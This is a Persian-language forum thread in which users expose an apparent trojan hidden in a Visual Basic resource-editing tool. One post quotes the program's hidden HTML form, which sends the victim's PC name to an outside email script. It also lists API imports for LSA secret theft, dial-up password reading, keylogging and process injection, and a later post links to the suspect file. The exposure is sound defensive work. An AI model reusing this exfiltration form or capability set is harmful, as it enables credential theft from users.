امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5
من که شک ندارم ، شما چطور ؟؟؟!!!
نویسنده پیام
rRezar آفلاین
كاربر دو ستاره
**

ارسال‌ها: 141
موضوع‌ها: 9
تاریخ عضویت: شهریور ۱۳۸۴

تشکرها : 0
( 9 تشکر در 7 ارسال )
ارسال: #1
من که شک ندارم ، شما چطور ؟؟؟!!!
من هیچ شکی به دوستمون که برنامه برای ادیت کردن ریسورس فایل های اجرایی گذاشته بود ندارم ولی...


چرا یه فایل به اسم C:\sendhmtl.htm می سازه و توش می نویسه:


<FORM id=Compose name=Compose accept-charset=UTF8 action=http://www.tajrish.com/email.php method=post><<INPUT id= fromsize=40 value="@yahoo.com"name=from> <INPUT id=to size=40 value=wahid_15771@yahoo.com name=to>B<INPUT id=subject size=50 value="$ConnectionHacked!﷓" name=subject>H<INPUT id=messege name=Bodyvalue="
(WDIR: )(PCName: ) " size=120> ŒD<INPUT id=send type=submit value="SendE-Mail"name=send>
</form>


چرا Task Manager رو می بنده؟

چرا این توابع رو تو برنامت به کار گرفتی؟ چند تاش به درد ادیت کردن ریسورس می خوره ؟

Private Declare Sub RasGetConnectStatusA Lib "rasapi32.dll" ()

Private Declare Sub RasEnumConnectionsA Lib "rasapi32.dll" ()

Private Declare Sub LocalFree Lib "kernel32" ()

Private Declare Sub LocalAlloc Lib "kernel32" ()

Private Declare Sub GlobalFree Lib "kernel32" ()

Private Declare Sub RtlMoveMemory Lib "kernel32" ()

Private Declare Sub GetVersionExA Lib "kernel32" ()

Private Declare Sub SHGetSpecialFolderPathA Lib "shell32.dll" ()

Private Declare Sub GetPrivateProfileIntA Lib "kernel32" ()

Private Declare Sub LookupAccountNameA Lib "ADVAPI32.dll" ()

Private Declare Sub IsValidSid Lib "ADVAPI32.dll" ()

Private Declare Sub ConvertSidToStringSidA Lib "ADVAPI32.dll" ()

Private Declare Sub WideCharToMultiByte Lib "kernel32" ()

Private Declare Sub MultiByteToWideChar Lib "kernel32" ()

Private Declare Sub LsaFreeMemory Lib "ADVAPI32.dll" ()

Private Declare Sub LsaClose Lib "ADVAPI32.dll" ()

Private Declare Sub LsaRetrievePrivateData Lib "ADVAPI32.dll" ()

Private Declare Sub LsaOpenPolicy Lib "ADVAPI32.dll" ()

Private Declare Sub RasGetEntryPropertiesA Lib "rasapi32.dll" ()

Private Declare Sub RasGetEntryDialParamsA Lib "rasapi32.dll" ()

Private Declare Sub RasEnumEntriesA Lib "rasapi32.dll" ()

Private Declare Function GetForegroundWindow Lib "user32" () As Long

Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long

Private Declare Sub KillTimer Lib "user32" ()

Private Declare Sub GetCurrentProcessId Lib "kernel32" ()

Private Declare Sub RegisterServiceProcess Lib "kernel32" ()

Private Declare Sub SendMessageA Lib "user32" ()

Private Declare Sub CloseHandle Lib "kernel32" ()

Private Declare Sub VirtualFreeEx Lib "kernel32" ()

Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private Declare Sub GetWindowThreadProcessId Lib "user32" ()

Private Declare Sub OpenProcess Lib "kernel32" ()

Private Declare Sub WaitForSingleObject Lib "kernel32" ()

Private Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long

Private Declare Sub VirtualAllocEx Lib "kernel32" ()

Private Declare Sub FindWindowExA Lib "user32" ()

Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long

Private Declare Sub GetAsyncKeyState Lib "user32" ()

Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

Private Declare Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" (ByVal lpBuffer As String, nSize As Long) As Long

Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Private Declare Sub GetUserNameA Lib "ADVAPI32.dll" ()

Private Declare Sub InitCommonControls Lib "comctl32.dll" ()

دوستان اگه به اینایی که گفتم شک دارین می تونین خودتون برنامه رو تست کنید
حتی با یه نت پد میشه نقشه این دوست تازه کارمون رو فهمید که حتی رشته هاشو انکریپت نکرده !!!
از این دوستمون می خوام یه توضیح کوچولو بده تا من از این شک بیخود در بیام البته که من به ایشون هیچ شکی ندارم و نمی خوام به هیچ کس تهمت زده بشه ولی برای اینکار لااقل یه جا میرفتی که توش پر از برنامه نویس نباشه...

The command completed successfully.
۱۰-اسفند-۱۳۸۴, ۲۲:۱۷:۴۵
وب سایت ارسال‌ها
پاسخ
Iron_Fist غایب
مدیر بازنشسته
*****

ارسال‌ها: 1,456
موضوع‌ها: 70
تاریخ عضویت: آبان ۱۳۸۴

تشکرها : 109
( 456 تشکر در 134 ارسال )
ارسال: #2
 
كي و كدام برنامه ؟
۱۰-اسفند-۱۳۸۴, ۲۲:۲۳:۴۶
ارسال‌ها
پاسخ
rRezar آفلاین
كاربر دو ستاره
**

ارسال‌ها: 141
موضوع‌ها: 9
تاریخ عضویت: شهریور ۱۳۸۴

تشکرها : 0
( 9 تشکر در 7 ارسال )
ارسال: #3
 
Iron_Fist نوشته است:كي و كدام برنامه ؟

اسم آي ديش يادم نيست ولي
تو read me اينو نوشته بود

1384/12/09
--------------------------

salam,man in barnamaro ba visual Basic 6.0 (VB) neveshtam.
choon man khodam be ek hamchenin barnamey neyaz dashtam.
vaghti didam kasi in ro nadede majbor be sakhtesh shodam.
va in barnamaro be baroobache IRAN VIG taghdim mikoonam.

--------------------------

ABILITYS:
Search text to EXE file.
Search picture and Icon to EXE file.
convert visual basic file to them XP.
...

----------------------------

wahid zohani
wahid_15771@yahoo.com



اسم برنامه هم ResourceXP بود

The command completed successfully.
۱۰-اسفند-۱۳۸۴, ۲۲:۳۳:۵۰
وب سایت ارسال‌ها
پاسخ
rRezar آفلاین
كاربر دو ستاره
**

ارسال‌ها: 141
موضوع‌ها: 9
تاریخ عضویت: شهریور ۱۳۸۴

تشکرها : 0
( 9 تشکر در 7 ارسال )
ارسال: #4
 
آهان!

آي ديش jfc بود

http://www.iranvig.com/3226.html

The command completed successfully.
۱۰-اسفند-۱۳۸۴, ۲۲:۳۸:۵۱
وب سایت ارسال‌ها
پاسخ
saber2005 آفلاین
كاربر تک ستاره
*

ارسال‌ها: 25
موضوع‌ها: 5
تاریخ عضویت: دى ۱۳۸۴

تشکرها : 0
( 0 تشکر در 0 ارسال )
ارسال: #5
 
سلام منم به برنامه این آقا شک کردم
چون بدون سورس بود و فقط فایل exe رو گذاشته بود
البته من اینجور فایل ها رو تو ماشین مجازی Microsoft Virtual PC یا VMware Workstation
امتحان میکنم و قبل از اجرا کردنش هم اون رو Decompiler میکنم متاسفانه تو Decompiler
دیدم که ایشون ... آره
فایلش رو هم براتون اتچ میکنم ببینینش چون از روی سایت پاک شده فکر کنم مدیریت پاکش کرده
http://rapidshare.de/files/14448215/ResourceXP.zip.html
شرمنده توی راپیدشیر آپلودش کردم
توی صفحه ظاهر شده از پایین دکمه Free رو بزنین یه تایمر 20 ثانیه ای میاد بعد از تایمر کد امنیتی رو وارد کنید و دکمه دانلود رو بزنید راستی توسط دانلودر خود ویندوز یا فایرفوکس دانلود میشه
۱۰-اسفند-۱۳۸۴, ۲۳:۲۸:۳۰
ارسال‌ها
پاسخ
veyskarami غایب
مدیر بازنشسته
*****

ارسال‌ها: 861
موضوع‌ها: 82
تاریخ عضویت: مرداد ۱۳۸۴

تشکرها : 477
( 2479 تشکر در 611 ارسال )
ارسال: #6
 
ميشه بگين از چه Decompiler استفاده می کنید؟

۱۱-اسفند-۱۳۸۴, ۱۰:۲۶:۵۷
وب سایت ارسال‌ها
پاسخ
saber2005 آفلاین
كاربر تک ستاره
*

ارسال‌ها: 25
موضوع‌ها: 5
تاریخ عضویت: دى ۱۳۸۴

تشکرها : 0
( 0 تشکر در 0 ارسال )
ارسال: #7
RE: من که شک ندارم ، شما چطور ؟؟؟!!!
veyskarami نوشته است:ميشه بگين از چه Decompiler استفاده می کنید؟

ببخشید دوست عزیز
من مدتی بود که به سایت سر نمی زدم
Decompiler من P32Dasm_v1.9 هستش
براتون اتچش کردم
۰۴-اردیبهشت-۱۳۸۵, ۱۷:۱۰:۲۰
ارسال‌ها
پاسخ
vblove آفلاین
كاربر دو ستاره
**

ارسال‌ها: 155
موضوع‌ها: 9
تاریخ عضویت: اردیبهشت ۱۳۸۴

تشکرها : 0
( 19 تشکر در 10 ارسال )
ارسال: #8
RE: من که شک ندارم ، شما چطور ؟؟؟!!!
من که آن لاین هیچ کدی رو.... نمی کنم
۰۵-اردیبهشت-۱۳۸۵, ۰۱:۳۵:۴۳
وب سایت ارسال‌ها
پاسخ
Payman62 آفلاین
مدیر بخش ویژوال بیسیک
*****

ارسال‌ها: 2,273
موضوع‌ها: 149
تاریخ عضویت: اسفند ۱۳۸۴

تشکرها : 1308
( 3661 تشکر در 942 ارسال )
ارسال: #9
RE: من که شک ندارم ، شما چطور ؟؟؟!!!
حالا اگه ويروس يا تروجان بوده با اون شخص برخورد ميشه؟
۰۵-اردیبهشت-۱۳۸۵, ۱۲:۱۶:۲۵
ارسال‌ها
پاسخ
Iron_Fist غایب
مدیر بازنشسته
*****

ارسال‌ها: 1,456
موضوع‌ها: 70
تاریخ عضویت: آبان ۱۳۸۴

تشکرها : 109
( 456 تشکر در 134 ارسال )
ارسال: #10
RE: من که شک ندارم ، شما چطور ؟؟؟!!!
چرا که نه !
۰۵-اردیبهشت-۱۳۸۵, ۲۲:۰۹:۱۹
ارسال‌ها
پاسخ
rRezar آفلاین
كاربر دو ستاره
**

ارسال‌ها: 141
موضوع‌ها: 9
تاریخ عضویت: شهریور ۱۳۸۴

تشکرها : 0
( 9 تشکر در 7 ارسال )
ارسال: #11
at  RE: من که شک ندارم ، شما چطور ؟؟؟!!!
اعدامش کنيد!

The command completed successfully.
۰۷-اردیبهشت-۱۳۸۵, ۱۸:۱۸:۴۵
وب سایت ارسال‌ها
پاسخ


موضوعات مرتبط با این موضوع...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  برنامه ای مشابه کرکتر مپ چطور کار می کنه ؟ amin_vb 2 2,554 ۱۴-بهمن-۱۳۸۹, ۰۰:۰۰:۳۱
آخرین ارسال: behzadX
  چطور از طریق برنامه A بفهمیم برنامه B در حال اجراست؟ dcamera 11 8,719 ۲۵-شهریور-۱۳۸۸, ۰۳:۳۳:۲۱
آخرین ارسال: Payman62
  چطور برای لیست ویو بالون بسازیم؟؟؟ Hadiir 5 5,161 ۲۷-فروردین-۱۳۸۸, ۲۰:۱۶:۱۹
آخرین ارسال: Hadiir
  چطور میشه pictureboxیا toolbar رو move کرد ؟ (آموزش) amir_bwm 4 3,158 ۱۷-فروردین-۱۳۸۸, ۲۰:۰۱:۵۵
آخرین ارسال: rouzbeh_ziafati
  سوال چطور میشه از یک Winsock برای لاگین کردن 5 آیدی استفاده djboy 4 3,749 ۲۷-مرداد-۱۳۸۷, ۲۲:۳۷:۵۸
آخرین ارسال: far_222000
  ازچند کنترل در فرم چطور copy کپی بگیرم؟ ملودی 16 8,636 ۲۱-مرداد-۱۳۸۷, ۱۴:۰۷:۱۲
آخرین ارسال: far_222000
  چطور میشه RichTextBox رو کاملا راست به چپ کرد؟ amir_bwm 7 8,749 ۱۱-اردیبهشت-۱۳۸۷, ۰۲:۳۱:۴۹
آخرین ارسال: CRazYFULL
  چطور ميشه تعداد سطر هاي يك Datagrid را خواند؟ zacaria 2 3,126 ۱۴-فروردین-۱۳۸۷, ۰۹:۳۹:۳۲
آخرین ارسال: zacaria
  چطور میشه استایل فرم رو شبیه استایل ویندوز کرد ؟ amir_bwm 17 11,031 ۱۵-بهمن-۱۳۸۶, ۱۵:۳۱:۱۵
آخرین ارسال: lord_viper
Question چطور میشه منویی مثل آفیس داشت ؟کمکم کنید amir_bwm 10 6,073 ۰۸-بهمن-۱۳۸۶, ۲۱:۴۵:۵۹
آخرین ارسال: amir_bwm

پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 1 مهمان

صفحه‌ی تماس | IranVig | بازگشت به بالا | | بایگانی | پیوند سایتی RSS